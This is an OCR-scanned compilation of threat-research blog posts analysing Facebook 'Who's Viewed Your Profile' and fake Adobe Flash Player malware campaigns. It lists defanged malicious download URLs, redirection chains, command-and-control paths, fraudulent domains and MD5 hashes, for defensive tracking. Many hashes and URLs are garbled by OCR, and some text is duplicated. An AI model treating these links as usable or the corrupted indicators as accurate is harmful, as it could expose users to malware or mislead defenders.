[2]MD5: 30cf98d7dc97cae57f8d72487966d20b - detected by 19 out of 49 antivirus scanners 
as Trojan-Ransomer.CLE; Troj/Mdrop-FNZ 

[3]MD5: 88dd376527c18639d3f8bf23f77b480e - detected by 8 out of 49 antivirus scanners 
as JS:Febipos-N [Trj]; JS/Febipos 


Once executed, MDS: 30cf98d7dc97cae57f8d72487966d20b also drops MDS: 
106320fc1282421f8f6cf5ebO206abee and MD5: 43b20dc1b437e0e3af5ae7b9965e0392 
on the affected hosts. It then phones back to 195.167.11.4: 


Two more MD5s from different malware campaigns, are known to have phoned back to 
195.167.11.4: 

MD5: 8192c574b8e96605438753c49510cd97 

MD5: d55de5e9ec25a80ddfecfb34d417b098 
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Privacy Policy 


This policy describes how and why Dislikelt LLC. Incorporated in the United States ("dba Dislikelt*) collects non-personally 
identifable data from users and website visitors to Dislikelt’s website (Dislikelt.com), and how that data will be used. Dislikelt is 
committed to respecting the privacy of non-personal identifiable data gathered. 


Use of Data 


Dislikelt uses non-personally identifable data collected from users and website visitors in order to: 


-To improve the quality and functionality of the Software and the website, to enhance your experience, to create new services, 
including customized services, to change or cancel existing content or services and for other internal and statistical purposes; 
-To present you relevant content, marketing materials and advertisements, by analyzing your interests from the web pages and 
you visit and online services that you use; 

-To provide you with support and handle inquires; 

-To enforce the Software EULA; 

-To comply with any applicable law and assist law enforcement agencies as required; 

-To conduct surveys and market researches; 

-We may use anonymous, statistical or aggregated information about the Software's use and share, publish, post, disseminate, 
transmit or otherwise communicate or make available such information, to suppliers, business partners, sponsors, affiliates and 
any other third party, at our sole discretion. 


Cookies and Log Files 


Cookies may be used on some pages of our site. Cookies are small text files placed on your hard drive that assist us in providing a 
more customized website experience. It is Dislikelt’s policy to use cookies to make navigation of our website easier for visitors. If 
you are concerned about cookies, most browsers permit individuals to decline cookies. A user refusing cookies can still fully 
navigate our website. In order to properly manage our website we may anonymously log information on our systems, and identify 
categories of visitors by items such as domains and browser types. These statistics are used to manage the operational efficiency of 
our systems. 


Age Limit 


We never knowingly collect or maintain information at or on our website from those we actually know are under 18, and no part of 
our website is directed at or structured to attract anyone under 18. Visitors younger than 18 years of age may NOT use the Site 
and the Software and must LEAVE immediately. 


Changes to Policy 


From time to time, we may revise this policy and we will post the revised Policy on the Site. Therefore, it is recommended that you 
read it periodically. All substantial changes made to this policy will be notified on the Site, at our sole discretion, and will take 
effect immediately. 


Governing Law 


This Privacy Policy is governed by and construed in accordance with the laws of the United States. You agree to submit any 
dispute arising out of your use of this Web site to the exclusive jurisdiction of the courts of THE UNITED STATES. 


Contact us 


Please direct all questions in connection with this Policy via e-mail to: info@http;//Dislikelt.com/ 


The Privacy Policy (hxxp://prostats. vfl.us/firefox/pp.html) and the EULA 
(hxxp://prostats.vfl.us/firefox/eula.html) point to hxxp://dislikelt.com - 176.74.176.179. 
Not surprisingly, multiple malicious MD5s are also known to have previously interacted with 
the same IP: 

MD5: d366088e4823829798bd59a4d456a3df 

MD5: 3c73db8202d084f33ab32069f40f58c8 

MD5: d7fcelec777c917f72530f79363fc6d3 

MD5: 83568d744ab226a0642233b93bfc7de6 

MD5: c84b1bd7c2063f34900bbc9712d66e0f 

MD5: 58baa919900656dacaf39927bb614cf1 

MD5: a86e97246a98206869be78fd451029a0 

MD5: 70a0894397ac6f65c64693f1606f1231 

MD5: f9166237199133b24cd866b61d0f6cca 

MD5: 0f24ad046790ee863fd03d19dbba7ea5 
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Based on the latest performance metrics for the campaign, over 190,000 users have already 
interacted with this sub-campaign, since 4th of December, when | initially analyzed the 
primary campaign. 
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prostats.vfi.us/ 191.278 
.:) Dobe tytacosers | Copy | 
Clicks 


Al cme 


Where This bitly Link Was Shared 


Other 


191,278 .... 
Geographic Distribution of Clicks 


Mf 


ne Ne 


PRR RRF3R322 


~e 


Monitoring of the campaign is naturally in progress. Updates will be posted as soon as new 
developments take place. 


This post has been reproduced from [4]Dancho Danchev’s blog . Follow him 
[5]Jon Twitter. 


1. http: //ddanchev. blogspot .com/2013/12/facebook-circulating-whos-viewed-your .htm 

2. https://www.virustotal.com/en/file/b44aabb0e235d36377f 3cd55ec4af596a89c0a7814103369d3£48d54d29ffcc7/analys 
is/1386720892/ 

3. https://www.virustotal.com/en/file/4106e0e655822060a3dc83777aa88554c4f 6e295b1f 947 4400d4820bd8e0d57b/analys 


is/1386720902/ 
4. http://ddanchev. blogspot .com/ 
5. http: //twitter.com/danchodanche 
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9.12.5 Continuing Facebook "Who’s Viewed Your Profile" Campaign Affects Another 
190k+ Users, Exposes Malicious Cybercrime Ecosystem (2013-12-11 05:01) 


o== 


My profile has been viewed today 998 times. 
Top 5 Visitors: 


a - 116 visits 


2- 64 visits 
3- 46 visits 

4- 34 visits 

oy 8 visits 


See who has viewed your profile HERE: 


http://NXIXBMQ.tk/?12358289 th eel 47 others 


Like * Comment 


Last week, immediately after | published the initial analysis detailing [l]a massive privacy- 
violating "Who’s Viewed Your Profile" campaign, that was circulating across Facebook, the 
cybercriminals behind it, supposedly took it offline, with one of the main redirectors now 
pointing to 127.0.0.1. 


Not surprisingly, the primary campaign has multiple sub-campaigns still in circulation, 
which based on the latest statistics - embedded within the campaign on the same day they 
supposedly shut it down - has already exposed another 190,000+ of the social network’s 
users - the original campaign appears to have been launched in 2011 having already exposed 
800,000+ users - to more rogue, privacy violating apps - JS.Febipos, Mindspark Interactive 
Network’s MylmageConverter and Trojan-Ransomer.CLE, in this particular case. 


Let’s dissect the still circulating campaign, expose the entire infrastructure supporting it, 
establish direct connections with it to related malicious campaigns, indicating that someone’s 
either multi-tasking, or that their malicious/fraudulent activities share the same infrastructure, 
provide MD5s for the currently served privacy-violating apps, as well as list the actual - 
currently live - hosting locations. 
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Ever wanted to know who is viewing your profile or who has viewed it while you 
were offline? Now you cant 

Just click the “Start Now" button below to find out! 

*Only work on Chrome and Firefox! 


t In a Relationship Single 


Y 1 Am: > 


Sample redirection chain: 


hxxp://NXJXBMQ.tk/?12358289 - 93.170.52.21; 93.170.52.33 -> 
hxxp://p2r0f3rviewer9890.co.nf/?SAK22222222222222222222222222222222222 
2222222222222222222222222222222222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 
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2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
222222222222 


2222222222222222222222222222222222222222222222222222222222222222222222 
22222ajsklifjasl 


fkjasfklja -> hxxp://prostats. vfl.us - 192.157.201.42 -> hxxp://whoviewsfb.uni.me/ch/profile.html! 
- 82.208.40.11 


Redirection chain domain name reconnaissance: 
NXJXBMQ.tk - 93.170.52.21; 93.170.52.33 
p2r0f3rviewer9890.co.nf - 83.125.22.192 


whoviewsfb.uni.me - 82.208.40.11 
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prostats.vfl.us - 192.157.201.42 
whOstalks.uni.me - 192.157.201.42 


cracks4free.info - 192.157.201.42 


Known to have responded to 93.170.52.21 are also the following fraudulent domains: 
0.facebook.com.fpama.tk 
001200133184123129811.tk 
OOwwebhost.tk 
01203313441.tk 
Olprof86841.tk 
029m8211t9fs.4ieiii.tk 
031601.tk 

0333.tk 

057 1baidu.tk 
O5pr0f1le21200.tk 
O5pr0file214741.tk 
060uty80w.tk 

O6emu.tk 

0886.tk 

Oakleycityn.tk 

OaoOgrecu.tk 
Ofcf7.chantaljltaste.tk 
Olod1lmt1.tk 


Olove.tk 
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The following malicious MD5s are also known to have phoned back to 93.170.52.21 in 
the past: 


MD5: ee78fe57ad8dbac96b31f41f7 7eb5877 
MD5: bed006372fc76ec261dc9b223b178438 
MD5: 58f9cbec80d1dc3a5afbb7339d200e66 
MD5: fd0c6b284f7700d59199c55fdcd5bd8a 
MD5: 4bfeb3c882d816d37c3e6cbb749e44af 
MD5: 97ec866ac26e961976e050591f49fec3 
MD5: aba1720b1a6747de5d5345b5893ba2f5 
MD5: de5e1f6f137ecb903a018976fc04e110 
MD5: a9669b65cabd6b25a32352ccf6c6c09a 
MD5: 003f4d9dafba9ee6e358b97b8026e354 
MD5: bab313e031b0c54d50fd82d221f7defc 
MD5: e66766f627b91fd420bd93fab4bc323f 
MD5: d63656d9b051bf762203b0c4ac728231 
MD5: 935440d970ee5a6640418574f4569dab 
MD5: 2524e3b4ed3663f5650563c1e431b05c 
MD5: f726646a41f95b12ec26cf01flc89cf9 
MD5: a5af6c04d28fcea476827437caf4c681 
MD5: c7346327f86298fa5dad160366a0cf26 
MD5: 912ed9ef063ae5b6b860fd34f3e8b83a 


MD5: b33aaa98ad706ced23d7c64aed0fcad6 


Known to have responded to 93.170.52.33 are also the following fraudulent domains: 
Olwwa.tk 


Omsms.tk 
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122.72.0.7sierra-web-www.szjlc-pcb.tk 
1z8dz.tk 

4flwz8.ga 

777898.ga 

888234.ml 

8eld7.tk 

abmomre.tk 
accountupdateinformation.tk 
ahram-org-eg.tk 

alex-fotos.tk 

allycam.tk 

amerdz.ml 

angelsmov.tk 

apis-drives-google.tk 
apis-googledrive.tk 

apple-idss.tk 
appleid.apple.com.cgi-bin.myappleid.woa.apple-idss.tk 


avtoshina.tk 


The following malicious MD5s are also known to have phoned back to 93.170.52.33 in 
the past: 


MD5: 2d951e649a8bbcbfa468f7916e188f9Ff 
MD5: dbe2c0788e74916eba251194ef783452 
MD5: 4bfeb3c882d816d37c3e6cbb749e44af 


MD5: dc01c1db51e26b585678701a64c94437 
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MD5: 61cc3de4e9a9865e0d239759ed3c7d5a 


MD5: 64505b7calce3c1c0c4892abe8d86321 


MD5: 0b98356395b2463ea0f339572b9c95ef 


MD5: 9e87c189d3cbf2fc2414934bef6e661b 


MD5: 48964a66bdc81b48f2fe7a31088c041b 


MD5: f81c85bea0e2251655b7112b352f302e 


The following MD5s are also known to have phoned back to 83.125.22.192 in the past: 


MD5: 3935b6efa7e5ee995f410f4efle613ab 


MD5: 64c1496e1ba2b7cb5c54a33c20be3e95 


MD5: 08f76a1ed5996d7dfdcf8226fe3f66b9 


MD5: f508d8034223c4ce233flbdbed265a3a 


Known to have responded to 82.208.40.11 are the following fraudulent domains: 


000e0062fb44cd5b277591349e070277.cz.cc 


003bc1b16c548efbc4f30790e0bc17be.cz.cc 


0057ab88a8febe310f94107137731424.cz.cc 


008447a58c242b52cb69fe7dceea9a0Nb.cz.cc 


00a47e5e57323f23c66f2c2d5bc1debc.cz.cc 


00a9a591d1e7aaf65639781bc73199d4.cz.cc 


00ad3353e0ba865a521da380ba4e0cc4.cz.cc 


00d55beb792962f7a04c66b85f2c6082.cz.cc 


00e3b9ece447187da3f43f98ab619a28.cz.cc 


00eb52dbc4331a64e4fd96fdca890d9c.cz.cc 


00f59cfa33cd097e943a38a8f2e343ee.CZ.CC 
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00fbdb49398f0e5fd9d5572044d8934e.cz.cc 
010ab81241856dfca44dd9ade4489fbc.cz.cc 
011622fb7752328ebb60bd2c075f1fe6.cz.cc 
O11 fbf88cfflc18e05c2afb53d6e5ffd.cz.cc 
0133147433aeef23bbe60df0cbc4eac9.cz.cc 
013f98b7157ae3754d463e9d2346a549.cz.cc 
013fa3e9db6e476282b8e9flbac6d68e.cz.cc 
017c2bd33744c2d423a2a7598a0c0a4e.cz.cc 


019368b1f3b364c0d3ec412680638f04.cz.cc 


The following malicious MD5s are also known to have phoned back to 82.208.40.11 in 
the past: 


MD5: 2c89dfc1706b31ba7delc14e229279e5 
MD5: 6719d3e8606d91734cde25b8dfc4156f 
MD5: 61dcea6fbf15b68be831bff8c5eb0c1d 

MD5: 3875fa91f060d02bddd43ff8e0046588 
MD5: 929b72813bae47f78125ec30c58f3165 
MD5: 96fa2ea6db2e4e9f00605032723e1777 
MD5: c46968386138739c81e219da6fb3ead5 
MD5: 3d627e0dbc5ac51761fa7cc7b202ec49 
MD5: d9714a0f7f881d3643125aa0461a30be 


MD5: 81171015a95073748994e463142ddcc7 


Known to have responded to 192.157.201.42 are also the following fraudulent domains: 
cracks4free.info 


prOlotra.p9.org 
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prostats.vfl.us 
whOprof.uni.me 


cracks4free.info 


Time to provide the actual, currently live, hosting locations for the served privacy-violating 
content. 


Who Viewed Your Profile 


\ More ways to experience Facebook 


Introducing the new "Who 
Viewed Your Profile" feature 
on facebook! 


Ever wanted to see how views your 
profile? 

on Facebook? Now you can! 

Let yourself do & already! ¥) Games 


It's Just an Extension to instal. facebook 
INSTALL 


Mindspark Interactive Network’s MylmageConverter served URL: 
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hxxp://download.myimageconverter.com/index.jhtml? partner=*AZ 0*xdm081 


Google Store served URLs: 


hxxps://chrome.google.com/webstore/detail/miapmjacmjonmofofflhnbafpbmfapac - currently 
active 


hxxps://chrome.google.com/webstore/detail/dllaajjfgpigkebIlmlbamflggfjkgbej 


Dropbox Accounts serving the Android app (offline due to heavy usage), and the Fire- 
fox extension: 


hxxps://dl.dropboxusercontent.com/s/rueyn3o0wrrpsbw4/whoviews5.xpi - currently online 


hxxps://dl.dropboxusercontent.com/s/so3vm50w298qkto/WhoViewsYourProfile.apk 


Error (509) 


This account's public links are generating too much traffic and have been temporarily 
disabled! 
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Facebook App URL: 


hxxp://apps.facebook.com/dislike _ _ 


Google Docs served privacy-violating apps: 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


hxxps://docs.google.com/uc?authuser=0 
port=download 


_button/ 


&id=0BziH-mKCuQwqVFIjUDBnTjFHdVE 


&id=0BziH-mKCuQwgqRXBMLWZ4cVZJV2s 


&id=O0BziH-mKCuQwqOxXlyNkoOVFBOdnM 


&id=0BziH-mKCuQwqZm5yeUFudFhqclU 


&id=0BziH-mKCuQwqbWpfNW5FalJmRGM 


&id=O0BziH-mKCuQwgS3V1ZkZBQjJGbjQ 


&id=0BziH-mKCuQwgX2xXbEJLbEYOQ3M 


&id=O0BziH-mKCuQwqMU5RVkJSWURXMEO 


&id=0BziH-mKCuQwqVFIjUDBnTjFHdVE 


GA Account IDs: UA-23441223-3; UA-12798017-1 


MylmageConverter Affiliate Network ID: ~AZ0*xdm081 


Detection rate for the served apps/extensions: 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


&ex- 


[2]MD5: 30cf98d7dc97cae57f8d72487966d20b - detected by 19 out of 49 antivirus scanners 


as Trojan-Ransomer.CLE; Troj/Mdrop-FNZ 
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[3]MD5: 88dd376527c18639d3f8bf23f77b480e - detected by 8 out of 49 antivirus scan- 
ners as JS:Febipos-N [Trj]; JS/Febipos 


Once executed, MD5: 30cf98d7dc97cae57f8d72487966d20b also drops MD5: 
106320fc1282421f8f6cf5ebO206abee and MDS5: 43b20dc1b437e0e3af5ae7b9965e0392 
on the affected hosts. It then phones back to 195.167.11.4: 


Two more MD5s from different malware campaigns, are known to have phoned back to 
195.167.11.4: 


MD5: 8192c574b8e96605438753c49510cd97 


MD5: d55de5e9ec25a80ddfecfb34d417b098 
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Privacy Policy 


This policy describes how and why Dislikelt LLC. Incorporated in the United States (*dba Dislikelt") collects non-personally 
identifable data from users and website visitors to Dislikelt’s website (Dislikelt.com), and how that data will be used. Dislikelt is 
committed to respecting the privacy of non-personal identifiable data gathered. 


Use of Data 


Dislikelt uses non-personally identifable data collected from users and website visitors in order to: 


-To improve the quality and functionality of the Software and the website, to enhance your experience, to create new services, 
including customized services, to change or cancel existing content or services and for other internal and statistical purposes; 
-To present you relevant content, marketing materials and advertisements, by analyzing your interests from the web pages and 
you visit and online services that you use; 

-To provide you with support and handle inquires; 

-To enforce the Software EULA; 

-To comply with any applicable law and assist law enforcement agencies as required; 

-To conduct surveys and market researches; 

-We may use anonymous, statistical or aggregated information about the Software's use and share, publish, post, disseminate, 
transmit or otherwise communicate or make available such information, to suppliers, business partners, sponsors, affiliates and 
any other third party, at our sole discretion. 


Cookies and Log Files 

Cookies may be used on some pages of our site. Cookies are small text files placed on your hard drive that assist us in providing a 
more customized website experience. It ts Dislikelt’s policy to use cookies to make navigation of our website easier for visitors. If 
you are concerned about cookies, most browsers permit individuals to decline cookies. A user refusing cookies can still fully 
navigate our website, In order to properly manage our website we may anonymously log information on our systems, and identify 
categories of visitors by items such as domains and browser types. These statistics are used to manage the operational efficiency of 
our systems. 

Age Limit 

We never knowingly collect or maintain information at or on our website from those we actually know are under 18, and no part of 
our website is directed at or structured to attract anyone under 18. Visitors younger than 18 years of age may NOT use the Site 
and the Software and must LEAVE immediately. 

Changes to Policy 

From time to time, we may revise this policy and we will post the revised Policy on the Site, Therefore, it is recommended that you 
read it periodically. All substantial changes made to this policy will be notified on the Site, at our sole discretion, and will take 
effect immediately. 

Governing Law 


This Privacy Policy is governed by and construed in accordance with the laws of the United States, You agree to submit any 
dispute arising out of your use of this Web site to the exclusive jurisdiction of the courts of THE UNITED STATES. 


Contact us 


Please direct all questions in connection with this Policy via e-mail to: info@http;//Dislikelt.com/ 


The Privacy Policy (hxxp.://prostats. vfl.us/firefox/pp.htm!) and the EULA 
(hxxp://prostats.vfl.us/firefox/eula.html) point to hxxp://dislikelt.com - 176.74.176.179. 
Not surprisingly, multiple malicious MD5s are also known to have previously interacted with 
the same IP: 

MD5: d366088e4823829798bd59a4d456a3df 

MD5: 3c73db8202d084f33ab32069f40f58c8 


MD5: d7fcelec777c917f72530f79363fc6d3 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 
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83568d744ab226a0642233b93bfc7de6 


c84b1bd7c2063f34900bbc9712d66e0f 


58baa919900656dacaf39927bb614cf1 


a86e97246a98206869be78fd451029a0 


70a0894397ac6f65c64693f1606f1231 


f9166237199133b24cd866b61d0f6cca 


0f24ad046790ee863fd03d19dbba7ea5 
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Based on the latest performance metrics for the campaign, over 190,000 users have al- 
ready interacted with this sub-campaign, since 4th of December, when | initially analyzed the 
primary campaign. 
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Monitoring of the campaign is naturally in progress. Updates will be posted as soon as 
new developments take place. 


1. http: //ddanchev. blogspot .com/2013/12/facebook-circulating-whos-viewed-your.htm 
2. bttps://www.virustotal.com/en/file/b44aabb0e235d36377f 3cd55ec4af596a89c0a7814103369d3f48d54d29ffcc7/analys 


is/1386720892/ 


3. https://www.virustotal.com/en/file/4106e0e655822060a3dc83777aa88554c4f 6e295b1f 947 4400d4820bd8e0d57b/analys 


is/1386720902/ 
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2014 


10.1 January 


10.1.1 Summarizing Webroot’s Threat Blog Posts for December (2014-01-06 17:07) 


Webroot Threat Blog 


Internet Security Threat Updates & Insights 


READ 


Webroot Blogs 


Search for 


| Search } 


Our Extended 
Community 


Top Authors 


o 
@ Dancho Danchev 


l Grayson Milbourne 


Nathan Collier 
Pe Tyler Moffitt 
re | Brenden Vaughan 


Looking For 
Support? 


The Webroot Community is 


happy to answer your 


questions, but @ you're lboking 


for our official support 
denariment nlease nnen a 


se: CONNECT 


t eal Team 


i WATCH @ DISCUSS" 


Top consumer security predictions for 2014 
December 31st, 2013 by Tyler Moffitt 


Top Predictions for 2014 FBIICE MoneyPak Cryptolocker Rogues As this year comes to a close we've seen some 
measurable progress on the infiltration techniques for malware. We're going to give you some insight into some of the 
top threats of 2013 and what & could mean for 2014. FBUICE MoneyPak We saw some fngening improvements 
with Ransomware this year FBVICE MoneyPak or Win32.Reveton was a huge hit to the PC communiy. Although first 
seen in 2012 & wasn’ until 2013 that & was tweaked to be one of the most annoying and difficult Ransomware to 
remove. Once dropped on your [...] 


CONTINUE READING » 


Posted in: FBi Ransomware, spyware, Threat Research 
Tagged 2014predictions consumer@eats Malidous Sofware malware phishing predictions Threat Research 
vulnerabilities Webroot biog 


Cybercrime Trends 2013 — Year in Review 
December 27th, 2013 by Dancho Danchev 


it's that time of the year! The moment when we reflect back on the cybercrime tactics, techniques and procedures 
(TTPs) that shaped 2013. in order to constructively speculate on what's to come for 2014 in terms of fraudulent and 
malicious campaigns, orchestrated by opportunistic cybercriminal adversaries across the globe. Throughout 2013 
we continued to observe and profile TTPs, which were crucial for the success, profitability and growth of the 
cybercrime ecosystem internationally, such as, for instance, widespread proliferation of the campaigns. 
professionalism and the implementation of basic business/economic/marketing concepts, improved QA (Quality 
Assurance), vertical integration in an attempt to occupy [...] 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for December, 
2013. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 
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01. [3]Cybercrime-friendly VPN service provider pitches itself as being ‘recommended by 
Edward Snowden’ 

02. [4]Commercial Windows-based compromised Web shells management application spotted 
in the wild 

03. [5]Compromised legitimate Web sites expose users to malicious Java/Symbian/Android 
“Browser Updates” 

04. [6]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cocktail 
of client-side exploits - part two 

05. [7]How cybercriminals efficiently violate YouTube, Facebook, Twitter, Instagram, Sound- 
Cloud and Google+’s ToS 

06. [8]Tumblr under fire from DIY CAPTCHA-solving, proxies-supporting automatic account 
registration tools 

07. [9]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercrimi- 
nals with bulletproof hosting capabilities - part three 

08. [10]Cybercriminals offer fellow cybercriminals training in Operational Security (OPSEC) 
09. [11]Fake ‘WhatsApp Missed Voicemail’ themed emails lead to pharmaceutical scams 

10. [12]A peek inside the booming underground market for stealth Bitcoin/Litecoin mining 
tools 

11. [13]Cybercrime Trends 2013 - Year in Review 


This post has been reproduced from [14]Dancho Danchev’s blog . Follow him 
[15]Jon Twitter. 


1. http://www .webroot .com/blog 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
3 


ttp://www. webroot .com/blog/2013/12/03/cybercrime-friendly-vpn-service-provider-pitches-recommended-edwa 


4. http://www.webroot .com/blog/2013/12/04/commercial-windows-based-compromised-web-shells-management- applica 


ion-spotted-wild/ 


5. bhttp://www.webroot .com/blog/2013/12/05/compromised-legitimate-web-sites-expose-users-malicious-javasymbia 


nandroid-browser-updates/ 


6. http://www.webroot .com/blog/2013/12/09/malicious-multi-hop-iframe-campaign-affects-thousands-web-sites-le 


ads-cocktail-client-side-exploits-part-two/ 


7. |attp://www.webroot.com/blog/2013/12/11/cybercriminals-efficiently-violate-monetize-youtube-facebook-twitt 


er-instagram-soundcloud-googles-tos/ 


8. hhttp: //www.webroot .com/blog/2013/12/12/tumblr-fire-diy-captcha-solving-proxies-supporting-automatic-acco 


nt-registration-tools/ 


9. http://www.webroot .com/blog/2013/12/16/newly-launched-http-based-botnet-setup-service-empowers-novice-cyb 


ercriminals-bulletproof-hosting-capabilities-part-three 


10. ttp://www.webroot.com/blog/2013/12/17/cybercriminals-offer-fellow-cybercriminals-training-in-operatio: 


al-security-opsec/ 


ae ttp://www.webroot.com/blog/2013/12/17/cybercriminals-offer-fellow-cybercriminals-training-in-operatio: 


al-security-opsec/ 


12. ttp://www.webroot .com/blog/2013/12/19/peek- inside-booming-underground-market-stealth-bitcoin-litecoin- 
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13. http://www. webroot .com/blog/2013/12/27/cybercrime-trends-2013-year-review/ 
14. http://ddanchev. blogspot .com/ 
15. http://twitter .com/danchodanche 


10.1.2 Fake Adobe Flash Player Serving Campaign Utilizes Google Host- 
ing/Redirection Infrastructure, Spreads Across Facebook (2014-01-07 21:09) 


What "better" time to spread malicious "joy", then during the Holidays? Cybercriminals are 
still busy maintaining a fake Adobe Flash Player serving, Facebook spreading campaign, 
which | originally intercepted during the Holidays, utilizing Google redirectors/hosting services. 
Despite the modest - naturally conservative estimate - click-through rate (45,000 clicks) 
compared to that of the most recently profiled similar [1]Febipos spreading campaign, which 
[2]resulted in over 1 million clicks, the campaign remains active, and continues tricking users 
into installing the rogue Adobe Flash Player, resulting in the continued spread of the campaign, 
on the Facebook Walls of socially engineered users. 


OS 


See also nonsense that does not follow anymore GgG these people do not pay 
attention to what you wear ? Sh4NcvDD27lyxWa 19 
others 


Odd minutes of the live broadcast! lwJ Dress-through the 
difficult moments of the artist! 7QqQW vDD2 


Like * Comment « Share 


Let’s dissect the campaign, expose its infrastructure/command and control servers, and 
provide MD5s of the served malware. 


Spamvertised Facebook URL+redirection chain: hxxp://goo.gl/QeshtO; 
hxxp://goo.gl/vVbrHp; hxxp://goo.gl/OoSJ7z; hxxp://goo.gl/38qlq8; hxxp://goo.gl/QNQhc5 -> 
hxxps://9dvmeO!lk2r0o0sqg3qb3rlk95z.storage.googleapis.com/qlfwum32gld35 iab9d2u4035- 
bjsvhjhu309.html?ref=12 -> hxxp://goo.gl/wKXmel -> hxxp://www.i-justice.org/g-0-27312- 
gooenn.html 

(94.23.166.27) -> hxxp://f3c47a0d01f3ec343f5 7-2ba5bba9317af81ae21c42000295a455.r9.cf4. 
rackcdn.com/24471bmbqv07595?ref=27312 S&aff  _sub=27312 &sub _id=27312 -> 
hxxp://www.eklentidunyasi.com/dl.php (176.31.2.155) or hxxp://www.agentofex.com/dl.php 
(176.227.218.99; www.puee.in) -> 

hxxp://docs.google.com/uc?export=download &id=OB6DFdqpSFDAISmpsTkZkT2hvN28 
or hxxps://doc-0g-40-docs.googleusercontent.com/docs/securesc/ha0ro937gcu 
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c7|7deffksulhg5h7mbp1/7fbm9gn67t&8t18r8etdd00jufOrvmrrmh/1387836000000/1 
6300082901287672546/*/OBZU3dARQGry0TIMxN3F2STNOZ3M 


GA Account ID: UA-36486228-1 


http://www.i-justice.o: ~-27312-gooenn.htmi 
http://goo.gliwKXme1 = ine aiiiatiaiiadaitcai Oey} 
i, ' - 
Total x 3] Po 
45,500 for t two hours | day | week | month | all time 
Referrers Browsers 
Other 
Others 
Uni nowes empty 
Countries Platforms 


a, 


Detection rate for the served malware: [3]MD5: 30118bec581f80de46445aef79e6cf10 - 
detected by 33 out of 48 antivirus scanners as Trojan-Ransom.Win32.Blocker.dbud. 


Once executed, the sample phones back to: 
hxxp://176.31.2.155/extFiles/control8.txt 
hxxp://176.31.2.155/extFiles/NewFile0008.exe 
hxxp://176.31.2.155/extFiles/version.txt 
hxxp://176.31.2.155/extFiles/list.txt 
hxxp://176.31.2.155/extFiles/list.txt 
hxxp://176.31.2.155/extFiles/buflash.xpi 
hxxp://176.31.2.155/extFiles/bunel10.zip 
hxxp://176.31.2.155/extFiles/private/sandbox _status.php 
hxxp://176.31.2.155/extFiles/extFiles/yok.txt 
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EB register login 


Uulavideolart oe BO 


Forget to wear pants, Selena Star sparks underwear riddle 


Please install Flash Player. 


tha 15,547 watcnes 1 day ago 
@ Vider share: §2 (9 in 
Navigator Social Newtork 
home GB Facebook 

: B twitter 


The files were offline in time of processing of the sample. 


Related MD5s for the same served fake Adobe Flash Player: 


MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 


61f5af5d0067ea8d10f0764ff3c82066 
80b9ef43183abdd5b22482bc1cea7b36 
2da/7cb838234eebbca3115fcafd6f513 
40ae8d901102ee3951c241b394eb94e9 
30118bec581f80de46445aef79e6cf10 
2de9865032e997d59c03bfd8435flada 
fce013bec7b3651c100b6887c0al2eee 
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@y Adobe [esl 


Adobe has encountered a problem and needs to close. We are sorry for the Sf 
inconvenience. 


If ou were in the middle of something, the information you were working on might be lost. 


Please tell Microsoft about this problem. 


We have created an error report that you can send to help us improve Adobe. We will treat 
this report as confidential and anonymous. 


What data does this error report contain? 


Why should | report to Microsoft? 


Microsoft Error Reporting cannot connect to the reporting servers at this time. If you would 
like to be prompted to report later, click Send Report Later. 


| Send Report Later i 


Once executed, MD5: fce013bec7b3651c100b6887c0al2eee phones back to: 
hxxp://176.227.218.99/extFiles/control17.txt 
hxxp://176.227.218.99/extFiles/NewFile00017.exe 
hxxp://46.163.100.240/NewFile00017.exe 
hxxp://176.227.218.99/NewFile00017.exe 
hxxp://176.227.218.99/extFiles/extFiles/version.txt 
hxxp://176.227.218.99/extFiles/extFiles/list.txt 
hxxp://176.227.218.99/extFiles/extFiles/buflash.xpi 
hxxp://176.227.218.99/extFiles/extFiles/bune10.zip 


Files remain offline in the time of processing of the sample. 


This post has been reproduced from [4]Dancho Danchev’s blog . Follow him 
[5]Jon Twitter. 


1. http: //ddanchev,blogapot.con/2013/12/continuing-facebook-whos-viewed-your. neal 

2, http: / /Adanchev, blogspot. con/2013/12/acebook-circulating-vhos-vieved-your neal 

3. https: //wws.virustotal .con/en/ts1e/adeci707efaa1406691d50ab12daaadi£65300{0ad68)33500e64N72d6466056 analy 
4. hetp://adanchev. blogspot con/ 

5, http: //exitter .con/danchodenchey 


10.1.3 Fake Adobe Flash Player Serving Campaign Utilizes Google Host- 
ing/Redirection Infrastructure, Spreads Across Facebook (2014-01-07 21:09) 


What "better" time to spread malicious "joy", then during the Holidays? Cybercriminals are 
still busy maintaining a fake Adobe Flash Player serving, Facebook spreading campaign, 
which I originally intercepted during the Holidays, utilizing Google redirectors/hosting services. 
Despite the modest - naturally conservative estimate - click-through rate (45,000 clicks) 
compared to that of the most recently profiled similar [1]Febipos spreading campaign, which 
